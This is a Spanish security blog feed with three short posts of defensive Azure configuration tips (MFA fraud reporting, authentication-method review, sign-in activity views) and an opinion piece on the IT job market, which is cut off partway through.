tag:blogger.com,1999:blog-6530287605593825462024-03-20T09:24:47.277+01:00INSEGUROS Seguridad informáticaUn blog de Kinomakinokinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comBlogger589125tag:blogger.com,1999:blog-653028760559382546.post-17651992858790832252024-03-04T10:35:00.002+01:002024-03-04T10:35:28.590+01:00Día 17: Revisa la configuración de tu Azure !!!<p> Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-2-revisa-la-configuracion-de-azure.html" target="_blank">Día 2</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-3-revisa-la-configuracion-de-azure.html" target="_blank">Día 3</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-4-revisa-la-configuracion-de-azure.html" target="_blank">Día 4 </a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-5-revisa-la-configuracion-de-tu.html" target="_blank">Día 5</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-6-revisa-la-configuracion-de-tu.html" target="_blank">Día 6</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-7-revisa-la-configuracion-de-tu.html" target="_blank">Día 7</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-8-revisa-configuracion-de-tu-azure.html" target="_blank">Día 8</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-9-revisa-la-configuracion-de-tu.html" target="_blank">Día 9</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-10-revisa-la-configuracion-de-tu.html" target="_blank">Día 1</a>0, <a href="https://kinomakino.blogspot.com/2024/01/dia-11-revisa-configuracion-de-tu-azure.html" target="_blank">Día 11</a> , <a href="https://kinomakino.blogspot.com/2024/01/dia-12-revisa-la-configuracion-de-tu.html" target="_blank">Día 12</a> , <a href="https://kinomakino.blogspot.com/2024/01/dia-13-revisa-la-configuracion-tu-azure.html" target="_blank">Día 13</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-14-revisa-la-configuracion-de-tu.html" target="_blank">Día 14</a>, <a href="https://kinomakino.blogspot.com/2024/02/dia-15-revisa-la-configuracion-de-tu.html" target="_blank">Día 15</a>, <a href="https://kinomakino.blogspot.com/2024/02/dia-16-revisa-la-configuracion-de-tu.html" target="_blank">Día 16</a> .</p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><h2><span style="color: red; font-size: medium;"><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Quieres acceder a algunas lecciones gratuitas del curso para verlo?<br /></span></b><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Aquí las tienes:</span></b></span><a data-attribute-index="0" href="https://buff.ly/3vEEQQz" style="background-color: white; border: var(--artdeco-reset-link-border-zero); box-sizing: inherit; font-family: -apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif; font-size: 14px; font-weight: var(--font-weight-bold); line-height: inherit; margin: var(--artdeco-reset-base-margin-zero); overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); position: relative; text-decoration: var(--artdeco-reset-link-text-decoration-none); touch-action: manipulation; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); word-break: normal;" target="_self"> https://buff.ly/3vEEQQz</a></h2><h2><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxEWePRGNpb3tc1c31y4M2d-FGiCbdSXkviZrpgnbDDxE2pfFRrHNYuFaLNGC2DcwBzL9RVIrTZTJVlJiiwvtgPZwwvVThgMIUhYGVEiX9EhHcTODpy0a1N52GBJKxeaKOP7_601E3-K2zFXAKLrGCdaDTdPYVpYf2PGe3N4FPlgUrWGMOYKOGU_uOux3O/s1200/formacion.seguridadsi.com.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxEWePRGNpb3tc1c31y4M2d-FGiCbdSXkviZrpgnbDDxE2pfFRrHNYuFaLNGC2DcwBzL9RVIrTZTJVlJiiwvtgPZwwvVThgMIUhYGVEiX9EhHcTODpy0a1N52GBJKxeaKOP7_601E3-K2zFXAKLrGCdaDTdPYVpYf2PGe3N4FPlgUrWGMOYKOGU_uOux3O/w640-h334/formacion.seguridadsi.com.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></h2><div class="separator" style="clear: both;">Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </div><div class="separator" style="clear: both;"><br /></div><h4><b>Consejo 17</b></h4><div>Cuando tenemos implementado un segundo factor de autenticación en nuestros clientes, vamos a seguir teniendo ataques, creeme. Ahora podemos configurar que los usuarios cuando reciban un intento de MFA en su aplicación por ejemplo, puedan identificarlo como fraude. </div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPEU58rURszUp7Ff6EESk3rGsg3zhylnZg3Kq1twg2P8qf8gUjBmbCpbDEwDXmL4cXT5m6tD2G10fkcfEtQvPw9NJWaZqjT7r6bTReQky2crs_VTwQndx0-CRZ8zWCvnu92M6e1GxtN3bXPMYf96h8qiKLSlYdOz-WLtgQFCgieRJ_fkpM8tkLPmghJiAU/s873/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="659" data-original-width="873" height="484" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPEU58rURszUp7Ff6EESk3rGsg3zhylnZg3Kq1twg2P8qf8gUjBmbCpbDEwDXmL4cXT5m6tD2G10fkcfEtQvPw9NJWaZqjT7r6bTReQky2crs_VTwQndx0-CRZ8zWCvnu92M6e1GxtN3bXPMYf96h8qiKLSlYdOz-WLtgQFCgieRJ_fkpM8tkLPmghJiAU/w640-h484/1.png" width="640" /></a></div><div><br /></div><div><br /></div><div>Al realizar esta acción, pasan dos cosas, se genera un log detallado de que no ha sido un error humano, sino un intento de fraude, y el nivel de riesgo del usuario sube. </div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEZXg7gIMjCa4Fb3HP6P1XAZSak2emo1J5gC_synDgLrjt6kzd0aWNUXPWSt74BeBs0ulJail9KaTgQZRbSpgOZfhlE0cp4Dfdk8HaKiu4ee9ZarE-mlTZOKG5fiY1ipx_XE0OQLX-DVOaJjYKA3bg86WUYHYJszRbVV28ta2vMvq69C6W4kG_1ChCqrd4/s1372/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="606" data-original-width="1372" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEZXg7gIMjCa4Fb3HP6P1XAZSak2emo1J5gC_synDgLrjt6kzd0aWNUXPWSt74BeBs0ulJail9KaTgQZRbSpgOZfhlE0cp4Dfdk8HaKiu4ee9ZarE-mlTZOKG5fiY1ipx_XE0OQLX-DVOaJjYKA3bg86WUYHYJszRbVV28ta2vMvq69C6W4kG_1ChCqrd4/w640-h282/2.png" width="640" /></a></div><div><br /></div><div><br /></div><div>Podemos indicar un correo también de administración para que un sysadmin sea notificado. También podemos bloquear la cuenta ( no lo recomiendo). Por último, tenemos la opción de indicar qué tecla deberíamos marcar en el teléfono, en el caso de que el MFA sea por llamada, para informar de fraude. </div><div>Una opción súper interesante y necesaria.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNms7qeaJI3AS4U3mDBMhbTQb50cfgYEmWgUY8l4dRLI0r40fOwj0MmsTYNgZHfbkcFt5RqLk7-unTrudS_c8s2SpHBYRa00Fe2zMYCm1TrcDKWs9SetB0lRle3zU1TJaeOoPp0v7FbwJzW6J-bKdHFtSPpHH9QzQILdNt6mYzKek4tVNkhiVXzeBgHpLC/s1127/Captura%20de%20pantalla%202024-03-04%20a%20las%2010.27.24%20(2).png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="274" data-original-width="1127" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNms7qeaJI3AS4U3mDBMhbTQb50cfgYEmWgUY8l4dRLI0r40fOwj0MmsTYNgZHfbkcFt5RqLk7-unTrudS_c8s2SpHBYRa00Fe2zMYCm1TrcDKWs9SetB0lRle3zU1TJaeOoPp0v7FbwJzW6J-bKdHFtSPpHH9QzQILdNt6mYzKek4tVNkhiVXzeBgHpLC/w640-h156/Captura%20de%20pantalla%202024-03-04%20a%20las%2010.27.24%20(2).png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dcursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/courses/especialista-en-seguridad-azure" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y varias opciones para hacerlo en <a href="https://formacion.seguridadsi.com/courses/especialista-en-hacking-azure-fraccionado-4" target="_blank">4 meses</a> y <a href="https://formacion.seguridadsi.com/courses/fraccionado-especialista-en-hacking-azure" target="_blank">8 meses</a>. </div><div><br /></div><div><i>El curso "no va de esto", algunas cosas sí. Estos consejos de momento son BÁSICOS, y el curso es de nivel ALTO, tenlo en cuenta.</i></div><div><br /></div><div><br /></div><div>Como siempre, gracias por leerme !!!</div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-38583233401105874822024-02-29T09:21:00.005+01:002024-02-29T09:21:36.917+01:00Día 16: Revisa la configuración de tu Azure !!!<p> Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-2-revisa-la-configuracion-de-azure.html" target="_blank">Día 2</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-3-revisa-la-configuracion-de-azure.html" target="_blank">Día 3</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-4-revisa-la-configuracion-de-azure.html" target="_blank">Día 4 </a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-5-revisa-la-configuracion-de-tu.html" target="_blank">Día 5</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-6-revisa-la-configuracion-de-tu.html" target="_blank">Día 6</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-7-revisa-la-configuracion-de-tu.html" target="_blank">Día 7</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-8-revisa-configuracion-de-tu-azure.html" target="_blank">Día 8</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-9-revisa-la-configuracion-de-tu.html" target="_blank">Día 9</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-10-revisa-la-configuracion-de-tu.html" target="_blank">Día 1</a>0, <a href="https://kinomakino.blogspot.com/2024/01/dia-11-revisa-configuracion-de-tu-azure.html" target="_blank">Día 11</a> , <a href="https://kinomakino.blogspot.com/2024/01/dia-12-revisa-la-configuracion-de-tu.html" target="_blank">Día 12</a> , <a href="https://kinomakino.blogspot.com/2024/01/dia-13-revisa-la-configuracion-tu-azure.html" target="_blank">Día 13</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-14-revisa-la-configuracion-de-tu.html" target="_blank">Día 14</a>, <a href="https://kinomakino.blogspot.com/2024/02/dia-15-revisa-la-configuracion-de-tu.html" target="_blank">Día 15</a></p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><h2><span style="color: red; font-size: medium;"><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Quieres acceder a algunas lecciones gratuitas del curso para verlo?<br /></span></b><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Aquí las tienes:</span></b></span><a data-attribute-index="0" href="https://buff.ly/3vEEQQz" style="background-color: white; border: var(--artdeco-reset-link-border-zero); box-sizing: inherit; font-family: -apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif; font-size: 14px; font-weight: var(--font-weight-bold); line-height: inherit; margin: var(--artdeco-reset-base-margin-zero); overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); position: relative; text-decoration: var(--artdeco-reset-link-text-decoration-none); touch-action: manipulation; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); word-break: normal;" target="_self"> https://buff.ly/3vEEQQz</a></h2><h2><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDetj6Lfr0kHabW92iu2RWVkB1agxtGh8EZ-XIgqb5Xp6pv3mKb5wm0kuzTISORg8ysXaNq0FyEaiFZ8iOrD59eHiKkndvYxkqPjaU-a66fvie34kHM0eb761D039KMC0uhu8Tlc9KcBU4yOxmrzo7rGDtW4HbYvz4GP-DkMBhaGfV7GB3arRYuAH9WfBh/s1200/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDetj6Lfr0kHabW92iu2RWVkB1agxtGh8EZ-XIgqb5Xp6pv3mKb5wm0kuzTISORg8ysXaNq0FyEaiFZ8iOrD59eHiKkndvYxkqPjaU-a66fvie34kHM0eb761D039KMC0uhu8Tlc9KcBU4yOxmrzo7rGDtW4HbYvz4GP-DkMBhaGfV7GB3arRYuAH9WfBh/w640-h334/16.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></h2><div class="separator" style="clear: both;">Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </div><div class="separator" style="clear: both;"><br /></div><h4><b>Consejo 16</b></h4><div>Una de las batallas que tenemos que lidiar en nuestro entorno Azure es la autenticación. De echo, espero que después de varios consejos, te vayas dando cuenta de que Azure es un gestor de identidades, no es un PaaS de Gigas y Cores... Pero vuelvo. En esta ocasión te voy a dar <a href="https://aad.portal.azure.com/#view/Microsoft_AAD_IAM/AuthenticationMethodsMenuBlade/~/AdminAuthMethods" target="_blank">este enlace</a> para que revises que mecanismos de autenticación tienes implementados. En cada escenario de negocio deberás usar el que se adapte a tus necesidades, aquí no te voy a decir cual usar, pero si es importante revisarlo, para ser consciente, y sobre todo, detectar un posible caso de compromiso en el que alguien ha activado algo que no controlas. Quizas no un atacante, un partner, pero el control de esto es básico.</div><div class="separator" style="clear: both; text-align: center;"><br /></div><div><div class="separator" style="clear: both; text-align: center;"><br /></div></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dcursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/courses/especialista-en-seguridad-azure" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y varias opciones para hacerlo en <a href="https://formacion.seguridadsi.com/courses/especialista-en-hacking-azure-fraccionado-4" target="_blank">4 meses</a> y <a href="https://formacion.seguridadsi.com/courses/fraccionado-especialista-en-hacking-azure" target="_blank">8 meses</a>. </div><div><br /></div><div><i>El curso "no va de esto", algunas cosas sí. Estos consejos de momento son BÁSICOS, y el curso es de nivel ALTO, tenlo en cuenta.</i></div><div><br /></div><div><br /></div><div>Como siempre, gracias por leerme !!!</div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-72086652175811380232024-02-27T20:15:00.001+01:002024-02-28T08:53:02.507+01:00Día 15: Revisa la configuración de tu Azure !!!<p>Estimados amigos de Inseguros !!!</p><p>Seguimos con la serie configuraciones y aspectos a revisar en la configuración de Azure. Viste el <a href="https://kinomakino.blogspot.com/2024/01/dia-1-revisa-la-configuracion-de-azure.html" target="_blank">Día 1</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-2-revisa-la-configuracion-de-azure.html" target="_blank">Día 2</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-3-revisa-la-configuracion-de-azure.html" target="_blank">Día 3</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-4-revisa-la-configuracion-de-azure.html" target="_blank">Día 4 </a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-5-revisa-la-configuracion-de-tu.html" target="_blank">Día 5</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-6-revisa-la-configuracion-de-tu.html" target="_blank">Día 6</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-7-revisa-la-configuracion-de-tu.html" target="_blank">Día 7</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-8-revisa-configuracion-de-tu-azure.html" target="_blank">Día 8</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-9-revisa-la-configuracion-de-tu.html" target="_blank">Día 9</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-10-revisa-la-configuracion-de-tu.html" target="_blank">Día 1</a>0, <a href="https://kinomakino.blogspot.com/2024/01/dia-11-revisa-configuracion-de-tu-azure.html" target="_blank">Día 11</a> , <a href="https://kinomakino.blogspot.com/2024/01/dia-12-revisa-la-configuracion-de-tu.html" target="_blank">Día 12</a> , <a href="https://kinomakino.blogspot.com/2024/01/dia-13-revisa-la-configuracion-tu-azure.html" target="_blank">Día 13</a>, <a href="https://kinomakino.blogspot.com/2024/01/dia-14-revisa-la-configuracion-de-tu.html" target="_blank">Día 14</a></p><p>Muchos de vosotros que me seguís y venís a los <a href="https://formacion.seguridadsi.com/collections/courses" target="_blank">cursos</a>, os gusta la teoría, os gusta el planteamiento de conocer en profundidad cómo funcionan las cosas, pero muchos se que queréis ir al grano, queréis el click rápido... Aunque no es mi visión, con esta serie voy a intentar daros algunos consejos, o pautas, o simplemente sitios donde pinchar a loco :-) para mejorar la seguridad de vuestros tenant Azure.</p><h2><span style="color: red; font-size: medium;"><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Quieres acceder a algunas lecciones gratuitas del curso para verlo?<br /></span></b><b><span face="-apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif" style="background-color: white;">Aquí las tienes:</span></b></span><a data-attribute-index="0" href="https://buff.ly/3vEEQQz" style="background-color: white; border: var(--artdeco-reset-link-border-zero); box-sizing: inherit; font-family: -apple-system, system-ui, "system-ui", "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif; font-size: 14px; font-weight: var(--font-weight-bold); line-height: inherit; margin: var(--artdeco-reset-base-margin-zero); overflow-wrap: normal; padding: var(--artdeco-reset-base-padding-zero); position: relative; text-decoration: var(--artdeco-reset-link-text-decoration-none); touch-action: manipulation; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); word-break: normal;" target="_self"> https://buff.ly/3vEEQQz</a></h2><h2><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDr98MTrHs5SR0_u7bojReyJALA0R9qN65hDUJJwmVxyjTMcrMdRG-SGHti9H0UjoRrsDyWcRlM7Ia8i5jAbBGox46Re6McgN44FOhPCo9XSexs1HkLtyZj1tg4FMAFcdSSFEBSdmWH7aGkDqAXNS_naRX_KbTUedmVbcNxFSWF8i8ZKo9a8lbVg__boCv/s1200/dia%2015.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDr98MTrHs5SR0_u7bojReyJALA0R9qN65hDUJJwmVxyjTMcrMdRG-SGHti9H0UjoRrsDyWcRlM7Ia8i5jAbBGox46Re6McgN44FOhPCo9XSexs1HkLtyZj1tg4FMAFcdSSFEBSdmWH7aGkDqAXNS_naRX_KbTUedmVbcNxFSWF8i8ZKo9a8lbVg__boCv/w640-h334/dia%2015.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></h2><div class="separator" style="clear: both;">Espero que os gusten los recursos que os voy dando, pero valorar la posibilidad de ir más allá y adentraros en conocer este mundo del cloud de Microsoft que sin duda es el presente de muchas organizaciones. </div><div class="separator" style="clear: both;"><br /></div><h4><b>Consejo 15</b></h4><div>Este consejo más que de configuración va de uso. El concepto es revisar los inicios de sesión que has tenido, con una información de aciertos, errores y tasa, agrupados por la aplicación. En vez de acceder al SingIn Logs en detalle, podemos acceder a <a href="https://aad.portal.azure.com/#view/Microsoft_AAD_IAM/UsageAndInsightsMenuBlade/~/Azure%20AD%20application%20activity" target="_blank">ESTA VISTA</a> y así tener información de valor, no sólo datos. Por supuesto podemos ampliar la información para verlos, pero de esta manera podemos detectar fallos, ataques, etc</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1TJp0ha6bglZj9fjcg-w4wPrypmaP-CF9o4UVX6A-jwfeakrjR2EbhBMEw1eC5BUTM1n0y47k9tdLojplRFMQm6f0VyGUNAQBoIriIMAEcw-nXJzLjx_rFrPhsmcjFr5v9vhPbPWj9un3ObqC4eQNyWK9d7QChotw6Mn0nHdzuvCmf_k0iqiZqf8U0sjc/s1488/Captura%20de%20pantalla%202024-02-27%20a%20las%2020.13.41.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="623" data-original-width="1488" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1TJp0ha6bglZj9fjcg-w4wPrypmaP-CF9o4UVX6A-jwfeakrjR2EbhBMEw1eC5BUTM1n0y47k9tdLojplRFMQm6f0VyGUNAQBoIriIMAEcw-nXJzLjx_rFrPhsmcjFr5v9vhPbPWj9un3ObqC4eQNyWK9d7QChotw6Mn0nHdzuvCmf_k0iqiZqf8U0sjc/w640-h268/Captura%20de%20pantalla%202024-02-27%20a%20las%2020.13.41.png" width="640" /></a></div><div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /></div><div>Lo has revisado? qué configuración tenías? Ánimate y sigue la serie. Este consejo es muy sencillo, pero iremos avanzando con otros quickwins más interesantes.</div><div><br /></div><div>Y en paralelo, ya sabes que tenemos dcursos relacionados con Azure en la academia. Uno <a href="https://formacion.seguridadsi.com/courses/especialista-en-seguridad-azure" target="_blank">grabado</a>, donde tu puedes hacerlo a tu aire, y varias opciones para hacerlo en <a href="https://formacion.seguridadsi.com/courses/especialista-en-hacking-azure-fraccionado-4" target="_blank">4 meses</a> y <a href="https://formacion.seguridadsi.com/courses/fraccionado-especialista-en-hacking-azure" target="_blank">8 meses</a>. </div><div><br /></div><div><i>El curso "no va de esto", algunas cosas sí. Estos consejos de momento son BÁSICOS, y el curso es de nivel ALTO, tenlo en cuenta.</i></div><div><br /></div><div><br /></div><div>Como siempre, gracias por leerme !!!</div>kinomakinohttp://www.blogger.com/profile/04212732574169652004noreply@blogger.comtag:blogger.com,1999:blog-653028760559382546.post-16567749399505886122024-02-06T18:05:00.000+01:002024-02-06T18:05:08.672+01:00Bubble Crash: No es un juego, es el fin de la burbuja?<p> Estimados amigos de Inseguros !!!</p><p>Llevo tiempo diciendolo, no en grandes foros, pero si en mi entorno, mis familiares, amigos, en gente que contacta conmigo por las redes. Estamos en una burbuja !!! la burbuja va a explotar... y así ha pasado.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8tH88975uhXW7hc85A5DXpV3OnwcfWnHimvIKgzV8gGACDyQElFmzm9MgVFqu_B4WSAKl63fk7kGbee32eIli61ld0usC8afmUS4ZdkTvn5WVhI49ICI0a06DZJRZXNN_DzNW4PgecJFYFSxPyoqhWTernd_nZOk8zpa9AVEy8Nt3-2D8oGhAJ9gq9s2k/s1000/69789499b358ea9f89c45567ad54a2486323643f24c-w1332.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="607" data-original-width="1000" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8tH88975uhXW7hc85A5DXpV3OnwcfWnHimvIKgzV8gGACDyQElFmzm9MgVFqu_B4WSAKl63fk7kGbee32eIli61ld0usC8afmUS4ZdkTvn5WVhI49ICI0a06DZJRZXNN_DzNW4PgecJFYFSxPyoqhWTernd_nZOk8zpa9AVEy8Nt3-2D8oGhAJ9gq9s2k/w640-h388/69789499b358ea9f89c45567ad54a2486323643f24c-w1332.jpeg" width="640" /></a></div><br /><p>Apenas haces dos días, encontrar un programador junior era una tarea de titanes. Todos con exigencias, teletrabajo por supuesto, y salarios por encima de los 32k, que para cualquier empresa del ibex35 o grande/mediana podría ser aceptable, pero para la realidad de las empresas no. En Murcia una consultora de 3 programadores, más uno de ventas, mas dirección, marketing... los números bailan hacia el abismo. Hablo de la realidad española, no de esas grandes. Yo trabajo con todas...</p><p>Ahora es más fácil encontrar a un junior recien salido, pagarle 18, y "formarle". MENTIRA, no le formas. Le pones a trabajar. Formar es pagar formación externa. Que va a aprender de sus compañeros, de los clientes, de sus jefes, eso es algo IMPLICITO del trabajar, no lo puedes vender como formación.</p><p>Encontrar alguien de ciber se había puesto por las nubes, hablo de una franja de... quizas 3 o 4 años como mucho, no se precisar si desde un poco antes del covid, ponle 2 años, hasta hace poco, dos años más post-covid.</p><p>La crisis, la ruptura de la burbuja está fraguando, además, como siempre, por culpa del sistema, de las propias empresas, de la formación, y en última estancia, por nuestra culpa. No soy muy experto, ni poco, en esto, pero si que tengo contactos, hablo, me cuenta, veo, leo, escucho, y me doy cuenta de que donde antes no había apenas paro, empieza haberlo. Hablo de situaciones en las que un devops recibía 3 llamadas a la semana, mejorando el dinero. Quizás el proyecto no, pero si las condiciones económicas brutas.</p><p>Pero como en todo, hay que cojer con pinzas este mensaje de la burbuja. La burbuja se ha roto para los medios, iba a decir mediocre, pero no es la palabra. Me explico. Los cracks de cada disciplina siguen recibiendo ofertas buenas, menos, pero siempre tienen salidas o áreas de mejora. Los juniors están encontrando ofertas, pero veo gente trabajando en ciber por 18k. Creeme, MUCHOS. Hablo con muchos alumnos, gente que quiere mejorar, y tienen un "cargo" en IT, ya sea IT o ciber vertical, y no cobran más de 25k.</p><p>Es decir, hemos vuelto a lo mismo, a que un trabajador de 